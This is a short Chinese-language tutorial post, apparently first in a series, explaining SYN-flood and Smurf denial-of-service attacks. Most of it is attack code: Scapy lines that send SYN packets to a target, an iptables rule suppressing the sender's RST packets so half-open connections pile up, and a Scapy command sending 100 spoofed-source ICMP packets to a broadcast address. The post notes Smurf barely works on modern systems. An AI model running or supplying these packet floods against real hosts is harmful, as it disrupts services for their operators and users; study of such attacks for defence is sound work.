1. 程式人生 > 實用技巧 >Dos拒絕服務Syn-Flood泛洪攻擊--Smurf 攻擊(一)

Dos拒絕服務Syn-Flood泛洪攻擊--Smurf 攻擊(一)

Dos拒絕服務
利用程式漏洞或一對一資源耗盡的Denial of Service 拒絕服務
DDos 分散式拒絕服務 多對一


Syn-Flood泛洪攻擊

傳送syn包欺騙伺服器建立半連線

攻擊程式碼,利用scapy

Scapy
– i=IP()
– i.dst=1.1.1.1
– i.display()
– t=TCP()
– sr1(i/t,verbose=1,timeout=3)
– sr1(IP(dst=1.1.1.1)/TCP())

防火牆配置關閉本機發送rst包

RST包的作用:告訴伺服器我不和你建立連線,計算機在接收到伺服器的ack+syn包的時候,系統會自動傳送RST

iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 1.1.1.1 -j DROP //指定IP,關閉本地傳送Rst包
netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}' //檢視本機tcp連線數

Smurf 攻擊
最古老的DDos攻擊技術
技術原理:利用icmp包,偽造源IP發廣播包,廣播區域網內的所有計算機回覆廣播包給偽造的IP,造成攻擊對偽造IP的效果
對現在的作業系統幾乎無效(不響應廣播包)

攻擊實現程式碼:

Scapy
– i=IP()
– i.dst
="1.1.1.255" – p=ICMP() – p.display() – r=(i/p) – send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1)